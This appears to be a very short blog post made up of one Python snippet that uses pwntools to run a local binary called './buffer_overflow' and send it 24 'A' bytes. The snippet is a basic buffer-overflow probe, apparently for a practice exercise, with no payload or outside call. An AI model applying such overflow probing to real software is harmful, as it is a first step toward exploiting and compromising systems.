Search
❯
Apr 19, 20251 min read
import pwn r = pwn.process("./buffer_overflow", aslr=True) r.send(b"A"*24) print(r.readall())